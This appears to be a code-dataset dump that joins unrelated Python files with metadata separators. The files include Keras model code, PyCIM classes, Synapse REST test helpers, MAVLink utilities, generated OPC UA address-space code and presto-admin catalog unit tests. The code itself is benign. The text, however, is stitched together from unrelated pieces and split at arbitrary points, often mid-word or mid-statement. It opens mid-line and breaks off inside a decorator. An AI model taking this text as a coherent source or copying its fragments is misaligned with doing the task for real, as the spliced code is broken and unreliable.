x = Activation('relu', name='block4_sepconv1_act')(x)
x = SeparableConv2D(728, (3, 3), padding='same', use_bias=False, name='block4_sepconv1')(x)
x = BatchNormalization(name='block4_sepconv1_bn')(x)
x = Activation('relu', name='block4_sepconv2_act')(x)
x = SeparableConv2D(728, (3, 3), padding='same', use_bias=False, name='block4_sepconv2')(x)
x = BatchNo
|
idea4bsd/idea4bsd
|
python/testData/copyPaste/Whitespace.after.py
|
Python
|
apache-2.0
| 59
| 0.016949
|
def
|
f():
try:
a = 1
except:
b = 1
| |
rwl/PyCIM
|
CIM14/IEC61968/PaymentMetering/LineDetail.py
|
Python
|
mit
| 2,482
| 0.004432
|
# Copyright (C) 2010-2011 Richard Lincoln
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associate
|
d documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portion
|
s of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from CIM14.Element import Element
class LineDetail(Element):
"""Details on an amount line, with rounding, date and note.
"""
def __init__(self, dateTime='', rounding=0.0, note='', amount=0.0, *args, **kw_args):
"""Initialises a new 'LineDetail' instance.
@param dateTime: Date and time when this line was created in the application process.
@param rounding: Totalised monetary value of all errors due to process rounding or truncating that is not reflected in 'amount'.
@param note: Free format note relevant to this line.
@param amount: Amount for this line item.
"""
#: Date and time when this line was created in the application process.
self.dateTime = dateTime
#: Totalised monetary value of all errors due to process rounding or truncating that is not reflected in 'amount'.
self.rounding = rounding
#: Free format note relevant to this line.
self.note = note
#: Amount for this line item.
self.amount = amount
super(LineDetail, self).__init__(*args, **kw_args)
_attrs = ["dateTime", "rounding", "note", "amount"]
_attr_types = {"dateTime": str, "rounding": float, "note": str, "amount": float}
_defaults = {"dateTime": '', "rounding": 0.0, "note": '', "amount": 0.0}
_enums = {}
_refs = []
_many_refs = []
|
apavlo/h-store
|
src/catgen/catalog_utils/testdata.py
|
Python
|
gpl-3.0
| 1,429
| 0.004899
|
#!/usr/bin/env python
# This file is part of VoltDB.
# Copyright (C) 2008-2010 VoltDB Inc.
#
# VoltDB is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# VoltDB is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with VoltDB. If not, see <http://www.gnu.org/licenses/>.
testspec = """
class
|
Database {
/** test comment */
// more comments
Partition* partitions; // more comments
Table* tables;
Program* programs;
Procedure* procedures;
}
/*
class Garbage {
Garbage garbage;
}
*/
class Partition {
bool isActive;
Range* ranges;
Replica* replicas;
}
class Table {
int type;
|
Table? buddy1;
Table? buddy2;
Column* columns;
Index* indexes;
Constraint* constraints;
}
class Program {
Program* programs;
Procedure* procedures;
Table* tables;
}
"""
def checkeq( a, b ):
if a != b:
raise Exception( 'test failed: %r != %r' % (a,b) )
|
rzr/synapse
|
tests/rest/client/v1/utils.py
|
Python
|
apache-2.0
| 4,828
| 0.000829
|
# -*- coding: utf-8 -*-
# Copyright 2014 OpenMarket Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limi
|
tations under the License.
# twisted imports
from twisted.internet import defer
# trial imports
from tests im
|
port unittest
from synapse.api.constants import Membership
import json
import time
class RestTestCase(unittest.TestCase):
"""Contains extra helper functions to quickly and clearly perform a given
REST action, which isn't the focus of the test.
This subclass assumes there are mock_resource and auth_user_id attributes.
"""
def __init__(self, *args, **kwargs):
super(RestTestCase, self).__init__(*args, **kwargs)
self.mock_resource = None
self.auth_user_id = None
def mock_get_user_by_token(self, token=None):
return self.auth_user_id
@defer.inlineCallbacks
def create_room_as(self, room_creator, is_public=True, tok=None):
temp_id = self.auth_user_id
self.auth_user_id = room_creator
path = "/createRoom"
content = "{}"
if not is_public:
content = '{"visibility":"private"}'
if tok:
path = path + "?access_token=%s" % tok
(code, response) = yield self.mock_resource.trigger("POST", path, content)
self.assertEquals(200, code, msg=str(response))
self.auth_user_id = temp_id
defer.returnValue(response["room_id"])
@defer.inlineCallbacks
def invite(self, room=None, src=None, targ=None, expect_code=200, tok=None):
yield self.change_membership(room=room, src=src, targ=targ, tok=tok,
membership=Membership.INVITE,
expect_code=expect_code)
@defer.inlineCallbacks
def join(self, room=None, user=None, expect_code=200, tok=None):
yield self.change_membership(room=room, src=user, targ=user, tok=tok,
membership=Membership.JOIN,
expect_code=expect_code)
@defer.inlineCallbacks
def leave(self, room=None, user=None, expect_code=200, tok=None):
yield self.change_membership(room=room, src=user, targ=user, tok=tok,
membership=Membership.LEAVE,
expect_code=expect_code)
@defer.inlineCallbacks
def change_membership(self, room, src, targ, membership, tok=None,
expect_code=200):
temp_id = self.auth_user_id
self.auth_user_id = src
path = "/rooms/%s/state/m.room.member/%s" % (room, targ)
if tok:
path = path + "?access_token=%s" % tok
data = {
"membership": membership
}
(code, response) = yield self.mock_resource.trigger("PUT", path,
json.dumps(data))
self.assertEquals(expect_code, code, msg=str(response))
self.auth_user_id = temp_id
@defer.inlineCallbacks
def register(self, user_id):
(code, response) = yield self.mock_resource.trigger(
"POST",
"/register",
json.dumps({
"user": user_id,
"password": "test",
"type": "m.login.password"
}))
self.assertEquals(200, code)
defer.returnValue(response)
@defer.inlineCallbacks
def send(self, room_id, body=None, txn_id=None, tok=None,
expect_code=200):
if txn_id is None:
txn_id = "m%s" % (str(time.time()))
if body is None:
body = "body_text_here"
path = "/rooms/%s/send/m.room.message/%s" % (room_id, txn_id)
content = '{"msgtype":"m.text","body":"%s"}' % body
if tok:
path = path + "?access_token=%s" % tok
(code, response) = yield self.mock_resource.trigger("PUT", path, content)
self.assertEquals(expect_code, code, msg=str(response))
def assert_dict(self, required, actual):
"""Does a partial assert of a dict.
Args:
required (dict): The keys and value which MUST be in 'actual'.
actual (dict): The test result. Extra keys will not be checked.
"""
for key in required:
self.assertEquals(required[key], actual[key],
msg="%s mismatch. %s" % (key, actual))
|
cea-ufmg/pyfdas
|
pyfdas/mavlog.py
|
Python
|
mit
| 891
| 0.001122
|
"""Log MAVLink stream."""
import argparse
from pymavlink import mavutil
import pymavlink.dialects.v10.ceaufmg as mavlink
def main():
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument("--verbose", action='store_true',
help="print messages to STDOUT")
|
parser.add_argument("--device", required=True, help="serial port")
parser.add_argument("--log", type=argparse.FileType('w'),
help="Log file")
parser.add_argument("--baudrate", type=int, help="serial port baud rate",
default=57600)
args = parser.parse_args()
conn = mavutil.mavlink_connection(args.device, baud=args.baudrate)
conn.logfile = args.log
while True:
msg = conn.recv_msg()
if arg
|
s.verbose and msg is not None:
print(msg)
if __name__ == '__main__':
main()
|
trunetcopter/trunetcopter
|
gui/pymavlink/mavextra.py
|
Python
|
gpl-3.0
| 16,655
| 0.005344
|
#!/usr/bin/env python
'''
useful extra functions for use by mavlink clients
Copyright Andrew Tridgell 2011
Released under GNU GPL version 3 or later
'''
import os, sys
from math import *
sys.path.insert(0, os.path.join(os.path.dirname(os.path.realpath(__file__)), 'examples'))
try:
# rotmat doesn't work on Python3.2 yet
from rotmat import Vector3, Matrix3
except Exception:
pass
def kmh(mps):
'''convert m/s to Km/h'''
return mps*3.6
def altitude(SCALED_PRESSURE, ground_pressure=None, ground_temp=None):
'''calculate barometric altitude'''
import mavutil
self = mavutil.mavfile_global
if ground_pressure is None:
if self.param('GND_ABS_PRESS', None) is None:
return 0
ground_pressure = self.param('GND_ABS_PRESS', 1)
if ground_temp is None:
ground_temp = self.param('GND_TEMP', 0)
scaling = ground_pressure / (SCALED_PRESSURE.press_abs*100.0)
temp = ground_temp + 273.15
return log(scaling) * temp * 29271.267 * 0.001
def mag_heading(RAW_IMU, ATTITUDE, declination=None, SENSOR_OFFSETS=None, ofs=None):
'''calculate heading from raw magnetometer'''
if declination is None:
import mavutil
declination = degrees(mavutil.mavfile_global.param('COMPASS_DEC', 0))
mag_x = RAW_IMU.xmag
mag_y = RAW_IMU.ymag
mag_z = RAW_IMU.zmag
if SENSOR_OFFSETS is not None and ofs is not None:
mag_x += ofs[0] - SENSOR_OFFSETS.mag_ofs_x
mag_y += ofs[1] - SENSOR_OFFSETS.mag_ofs_y
mag_z += ofs[2] - SENSOR_OFFSETS.mag_ofs_z
headX = mag_x*cos(ATTITUDE.pitch) + mag_y*sin(ATTITUDE.roll)*sin(ATTITUDE.pitch) + mag_z*cos(ATTITUDE.roll)*sin(ATTITUDE.pitch)
headY = mag_y*cos(ATTITUDE.roll) - mag_z*sin(ATTITUDE.roll)
heading = degrees(atan2(-headY,headX)) + declination
if heading < 0:
heading += 360
return heading
def mag_field(RAW_IMU, SENSOR_OFFSETS=None, ofs=None):
'''calculate magnetic field strength from raw magnetometer'''
mag_x = RAW_IMU.xmag
mag_y = RAW_IMU.ymag
mag_z = RAW_IMU.zmag
if SENSOR_OFFSETS is not None and ofs is not None:
mag_x += ofs[0] - SENSOR_OFFSETS.mag_ofs_x
mag_y += ofs[1] - SENSOR_OFFSETS.mag_ofs_y
mag_z += ofs[2] - SENSOR_OFFSETS.mag_ofs_z
return sqrt(mag_x**2 + mag_y**2 + mag_z**2)
def angle_diff(angle1, angle2):
'''show the difference between two angles in degrees'''
ret = angle1 - angle2
if ret > 180:
ret -= 360;
if ret < -180:
ret += 360
return ret
average_data = {}
def average(var, key, N):
'''average over N points'''
global average_data
if not key in average_data:
average_data[key] = [var]*N
return var
average_data[key].pop(0)
average_data[key].append(var)
return sum(average_data[key])/N
derivative_data = {}
def second_derivative_5(var, key):
'''5 point 2nd derivative'''
global derivative_data
import mavutil
tnow = mavutil.mavfile_global.timestamp
if not key in derivative_data:
derivative_data[key] = (tnow, [var]*5)
return 0
(last_time, data) = derivative_data[key]
data.pop(0)
data.append(var)
derivative_data[key] = (tnow, data)
h = (tnow - last_time)
# N=5 2nd derivative from
# http://www.holoborodko.com/pavel/numerical-methods/numerical-derivative/smooth-low-noise-differentiators/
ret = ((data[4] + data[0]) - 2*data[2]) / (4*h**2)
return ret
def second_derivative_9(var, key):
'''9 point 2nd derivative'''
global derivative_data
import mavutil
tnow = mavutil.mavfile_global.timestamp
if not key in derivative_data:
derivative_data[key] = (tnow, [var]*9)
return 0
(last_time, data) = derivative_data[key]
data.pop(0)
data.append(var)
derivative_data[key] = (tnow, data)
h = (tnow - last_time)
# N=5 2nd derivative from
# http://www.holoborodko.com/pavel/numerical-methods/numerical-derivative/smooth-low-noise-differentiators/
f = data
ret = ((f[8] + f[0]) + 4*(f[7] + f[1]) + 4*(f[6]+f[2]) - 4*(f[5]+f[3]) - 10*f[4])/(64*h**2)
return ret
lowpass_data = {}
def lowpass(var, key, factor):
'''a simple lowpass filter'''
global lowpass_data
if not key in lowpass_data:
lowpass_data[key] = var
else:
lowpass_data[key] = factor*lowpass_data[key] + (1.0 - factor)*var
return lowpass_data[key]
last_diff = {}
def diff(var, key):
'''calculate differences between
|
values'''
global last_diff
ret = 0
if not key in last_diff:
last_diff[key] = var
return 0
ret = var - last_diff[key]
last_diff[key] = var
return ret
last_delta = {}
def delta(var, key, tusec=None):
'''calculate slope'''
global last_delta
if tusec is not None:
tnow = tusec * 1.0e-6
else:
import mavutil
|
tnow = mavutil.mavfile_global.timestamp
dv = 0
ret = 0
if key in last_delta:
(last_v, last_t, last_ret) = last_delta[key]
if last_t == tnow:
return last_ret
if tnow == last_t:
ret = 0
else:
ret = (var - last_v) / (tnow - last_t)
last_delta[key] = (var, tnow, ret)
return ret
def delta_angle(var, key, tusec=None):
'''calculate slope of an angle'''
global last_delta
if tusec is not None:
tnow = tusec * 1.0e-6
else:
import mavutil
tnow = mavutil.mavfile_global.timestamp
dv = 0
ret = 0
if key in last_delta:
(last_v, last_t, last_ret) = last_delta[key]
if last_t == tnow:
return last_ret
if tnow == last_t:
ret = 0
else:
dv = var - last_v
if dv > 180:
dv -= 360
if dv < -180:
dv += 360
ret = dv / (tnow - last_t)
last_delta[key] = (var, tnow, ret)
return ret
def roll_estimate(RAW_IMU,GPS_RAW_INT=None,ATTITUDE=None,SENSOR_OFFSETS=None, ofs=None, mul=None,smooth=0.7):
'''estimate roll from accelerometer'''
rx = RAW_IMU.xacc * 9.81 / 1000.0
ry = RAW_IMU.yacc * 9.81 / 1000.0
rz = RAW_IMU.zacc * 9.81 / 1000.0
if ATTITUDE is not None and GPS_RAW_INT is not None:
ry -= ATTITUDE.yawspeed * GPS_RAW_INT.vel*0.01
rz += ATTITUDE.pitchspeed * GPS_RAW_INT.vel*0.01
if SENSOR_OFFSETS is not None and ofs is not None:
rx += SENSOR_OFFSETS.accel_cal_x
ry += SENSOR_OFFSETS.accel_cal_y
rz += SENSOR_OFFSETS.accel_cal_z
rx -= ofs[0]
ry -= ofs[1]
rz -= ofs[2]
if mul is not None:
rx *= mul[0]
ry *= mul[1]
rz *= mul[2]
return lowpass(degrees(-asin(ry/sqrt(rx**2+ry**2+rz**2))),'_roll',smooth)
def pitch_estimate(RAW_IMU, GPS_RAW_INT=None,ATTITUDE=None, SENSOR_OFFSETS=None, ofs=None, mul=None, smooth=0.7):
'''estimate pitch from accelerometer'''
rx = RAW_IMU.xacc * 9.81 / 1000.0
ry = RAW_IMU.yacc * 9.81 / 1000.0
rz = RAW_IMU.zacc * 9.81 / 1000.0
if ATTITUDE is not None and GPS_RAW_INT is not None:
ry -= ATTITUDE.yawspeed * GPS_RAW_INT.vel*0.01
rz += ATTITUDE.pitchspeed * GPS_RAW_INT.vel*0.01
if SENSOR_OFFSETS is not None and ofs is not None:
rx += SENSOR_OFFSETS.accel_cal_x
ry += SENSOR_OFFSETS.accel_cal_y
rz += SENSOR_OFFSETS.accel_cal_z
rx -= ofs[0]
ry -= ofs[1]
rz -= ofs[2]
if mul is not None:
rx *= mul[0]
ry *= mul[1]
rz *= mul[2]
return lowpass(degrees(asin(rx/sqrt(rx**2+ry**2+rz**2))),'_pitch',smooth)
def rotation(ATTITUDE):
'''return the current DCM rotation matrix'''
r = Matrix3()
r.from_euler(ATTITUDE.roll, ATTITUDE.pitch, ATTITUDE.yaw)
return r
def mag_rotation(RAW_IMU, inclination, declination):
'''return an attitude rotation matrix that is consistent with the current mag
vector'''
m_body = Vector3(RAW_IMU.xmag, RAW_IMU.ymag, RAW_IMU.zmag)
m_earth = Vector3(m_body.length(), 0, 0)
r = Matrix3()
r.from_euler(0, -radians(inclination), radians(declination))
m_earth
|
iirob/python-opcua
|
opcua/server/standard_address_space/standard_address_space_part11.py
|
Python
|
lgpl-3.0
| 125,106
| 0.000767
|
# -*- coding: utf-8 -*-
"""
DO NOT EDIT THIS FILE!
It is automatically generated from opcfoundation.org schemas.
"""
from opcua import ua
from opcua.ua import NodeId, QualifiedName, NumericNodeId, StringNodeId, GuidNodeId
from opcua.ua import NodeClass, LocalizedText
def create_standard_address_space_Part11(server):
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(56, 0)
node.BrowseName = QualifiedName('HasHistoricalConfiguration', 0)
node.NodeClass = NodeClass.ReferenceType
node.ParentNodeId = NumericNodeId(44, 0)
node.ReferenceTypeId = NumericNodeId(45, 0)
attrs = ua.ReferenceTypeAttributes()
attrs.Description = LocalizedText("The type for a reference to the historical configuration for a data variable.")
attrs.DisplayName = LocalizedText("HasHistoricalConfiguration")
attrs.InverseName = LocalizedText("HistoricalConfigurationOf")
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(45, 0)
ref.SourceNodeId = NumericNodeId(56, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(44, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11192, 0)
node.BrowseName = QualifiedName('HistoryServerCapabilities', 0)
node.NodeClass = NodeClass.Object
node.ParentNodeId = NumericNodeId(2268, 0)
node.ReferenceTypeId = NumericNodeId(47, 0)
node.TypeDefinition = NumericNodeId(2330, 0)
attrs = ua.ObjectAttributes()
attrs.DisplayName = LocalizedText("HistoryServerCapabilities")
attrs.EventNotifier = 0
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11192, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11193, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11192, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11242, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11192, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11273, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11192, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11274, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11192, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11196, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11192, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11197, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11192, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11198, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11192, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11199, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11192, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11200, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11192, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11281, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11192, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11282, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11192, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11283, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11192, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11502, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11192, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11275, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(47, 0)
ref.SourceNodeId = NumericNodeId(11192, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11201, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(47, 0)
ref.SourceNodeId = NumericNodeId(11192, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2268, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11192, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2330, 0)
refs.append(ref)
s
|
erver.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11193, 0)
node.BrowseName = QualifiedName('AccessHistoryDataCapability', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(11192, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = Localiz
|
edText("AccessHistoryDataCapability")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11193, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11193, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11192, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11242, 0)
node.BrowseName = QualifiedName('AccessHistoryEventsCapability', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(11192, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("AccessHistoryEventsCapability")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref
|
rackerlabs/solum-horizon
|
solumdashboard/exceptions.py
|
Python
|
apache-2.0
| 854
| 0.001171
|
# Copyright (c) 2014 Rackspace Hosting.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF AN
|
Y KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from openstack_dashboard import exceptions
#fr
|
om solumclient.openstack.common.apiclient import exceptions as solumclient
NOT_FOUND = exceptions.NOT_FOUND
RECOVERABLE = exceptions.RECOVERABLE
# + (solumclient.ClientException,)
UNAUTHORIZED = exceptions.UNAUTHORIZED
|
prestodb/presto-admin
|
tests/unit/test_catalog.py
|
Python
|
apache-2.0
| 9,157
| 0.000655
|
# -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
tests for catalog module
"""
import os
import fabric.api
from fabric.operations import _AttributeString
from mock import patch
from prestoadmin import catalog
from prestoadmin.util import constants
from prestoadmin.util.exception import ConfigurationError, \
ConfigFileNotFoundError
from prestoadmin.standalone.config import PRESTO_STANDALONE_USER_GROUP
from prestoadmin.util.local_config_util import get_catalog_directory
from tests.unit.base_unit_case import BaseUnitCase
class TestCatalog(BaseUnitCase):
def setUp(self):
super(TestCatalog, self).setUp(capture_output=True)
@patch('prestoadmin.catalog.os.path.isfile')
def test_add_not_exist(self, isfile_mock):
isfile_mock.return_value = False
self.assertRaisesRegexp(ConfigurationError,
'Configuration for catalog dummy not found',
catalog.add, 'dummy')
@patch('prestoadmin.catalog.validate')
@patch('prestoadmin.catalog.deploy_files')
@patch('prestoadmin.catalog.os.path.isfile')
def test_add_exists(self, isfile_mock, deploy_mock, validate_mock):
isfile_mock.return_value = True
catalog.add('tpch')
filenames = ['tpch.properties']
deploy_mock.assert_called_with(filenames,
get_catalog_directory(),
constants.REMOTE_CATALOG_DIR,
PRESTO_STANDALONE_USER_GROUP)
validate_mock.assert_called_with(filenames)
@patch('prestoadmin.catalog.deploy_files')
@patch('prestoadmin.catalog.os.path.isdir')
@patch('prestoadmin.catalog.os.listdir')
@patch('prestoadmin.catalog.validate')
def test_add_all(self, mock_validate, listdir_mock, isdir_mock,
deploy_mock):
catalogs = ['tpch.properties', 'another.properties']
listdir_mock.return_value = catalogs
catalog.add()
deploy_mock.assert_called_with(catalogs,
get_catalog_directory(),
constants.REMOTE_CATALOG_DIR,
PRESTO_STANDALONE_USER_GROUP)
@patch('prestoadmin.catalog.deploy_files')
@patch('prestoadmin.catalog.os.path.isdir')
def test_add_all_fails_if_dir_not_there(self, isdir_mock, deploy_mock):
isdir_mock.return_value = False
self.assertRaisesRegexp(ConfigFileNotFoundError,
r'Cannot add catalogs because directory .+'
r' does not exist',
catalog.add)
self.assertFalse(deploy_mock.called)
@patch('prestoadmin.catalog.sudo')
@patch('prestoadmin.catalog.os.path.exists')
@patch('prestoadmin.catalog.os.remove')
def test_remove(self, local_rm_mock, exists_mock, sudo_mock):
script = ('if [ -f /etc/presto/catalog/tpch.properties ] ; '
'then rm /etc/presto/catalog/tpch.properties ; '
'else echo "Could not remove catalog \'tpch\'. '
'No such file \'/etc/presto/catalog/tpch.properties\'"; fi')
exists_mock.return_value = True
fabric.api.env.host = 'localhost'
catalog.remove('tpch')
sudo_mock.assert_called_with(script)
local_rm_mock.assert_called_with(get_catalog_directory() +
'/tpch.properties')
@patch('prestoadmin.catalog.sudo')
@patch('prestoadmin.catalog.os.path.exists')
def test_remove_failure(self, exists_mock, sudo_mock):
exists_mock.return_value = False
fabric.api.env.host = 'localhost'
out = _AttributeString()
out.succeeded = False
sudo_mock.return_value = out
self.assertRaisesRegexp(SystemExit,
'\\[localhost\\] Failed to remove catalog tpch.',
catalog.remove,
'tpch')
@patch('prestoadmin.catalog.sudo')
@patch('prestoadmin.catalog.os.path.exists')
def test_remove_no_such_file(self, exists_mock, sudo_mock):
exists_mock.return_value = False
fabric.api.env.host = 'localhost'
error_msg = ('Could not remove catalog tpch: No such file ' +
os.path.join(get_catalog_directory(), 'tpch.properties'))
out = _AttributeString(error_msg)
out.succeeded = True
sudo_mock.return_value = out
self.assertRaisesRegexp(SystemExit,
'\\[localhost\\] %s' % error_msg,
catalog.remove,
'tpch')
@patch('prestoadmin.catalog.os.listdir')
@patch('prestoadmin.catalog.os.path.isdir')
def test_warning_if_connector_dir_empty(self, isdir_mock, listdir_mock):
isdir_mock.return_value = True
listdir_mock.return_value = []
catalog.add()
self.assertEqual('\nWarning: Directory %s is empty. No catalogs will'
' be deployed\n\n' % get_catalog_directory(),
self.test_stderr.getvalue())
@patch('prestoadmin.catalog.os.listdir')
@patch('prestoadmin.catalog.os.path.isdir')
def test_add_permission_denied(self, isdir_mock, listdir_mock):
isdir_mock.return_value = True
error_msg = ('Permission denied')
listdir_mock.side_effect = OSError(13, error_msg)
fabric.api.env.host = 'localhost'
self.assertRaisesRegexp(SystemExit, '\[localhost\] %s' % error_msg,
catalog.add)
@patch('prestoadmin.catalog.os.remove')
@patch('prestoadmin.catalog.remove_file')
def test_remove_os_error(self, remove_file_mock, remove_mock):
fabric.api.env.host = 'localhost'
error = OSError(13, 'Permission denied')
remove_mock.side_effect = error
self.assertRaisesRegexp(OSError, 'Permission denied',
catalog.remove, 'tpch')
@patch('prestoadmin.catalog.secure_create_directory')
@patch('prestoadmin.util.fabricapi.put')
